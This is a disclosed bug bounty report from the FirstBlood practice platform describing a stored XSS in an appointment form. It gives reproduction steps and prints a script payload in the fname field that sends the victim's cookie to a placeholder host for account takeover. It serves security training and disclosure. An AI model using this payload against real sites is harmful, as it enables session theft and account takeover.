Enable Ambulance Service for the Appointment leading to Stored XSS

FirstBlood-#1298 — Enable Ambulance Service for the Appointment leading to Stored XSS
This issue was discovered on FirstBlood v3

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2022-12-09, mr_xhunt Level 8 reported:


Summary:
I have found that while Creating the Appointment, adding ambulance parameter with value 1 enables the Ambulance service for us. and Adding the XSS payload in the fname gets us Stored XSS on the /api/ambulances.php.
Steps to Reproduce:

You need to Create a Appointment and Intercept the request in Burpsuite
Add a new parameter ambulance with value 1



Now Add the payload in the fname parameter: hello"><script>document.location=http://LOCALHOST/${document.cookie}</script/x>



Now go to the following endpoint and Enter the appointment guid:
https://7cac14721157-mrxhunt.a.firstbloodhackers.com/api/ambulances.php?select=18ce7d19-b364-479b-97d3-7522453a2d83
On visiting the page you will get alert box popup



Using the payload given will leak the cookie and Can be used for ATO


Remediation:
The fname parameter values must be sanitized before writing it into the source.

This report has been publicly disclosed for everyone to view

P2 High

Endpoint: /api/ba.php & /api/ambulances.php

Parameter: ambulance & fname

Payload: 1 & hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>

FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the users first/last name. For this to work the parameter ambulance=1 must be set

BugBountyHunter

Summary:

Steps to Reproduce:

Remediation: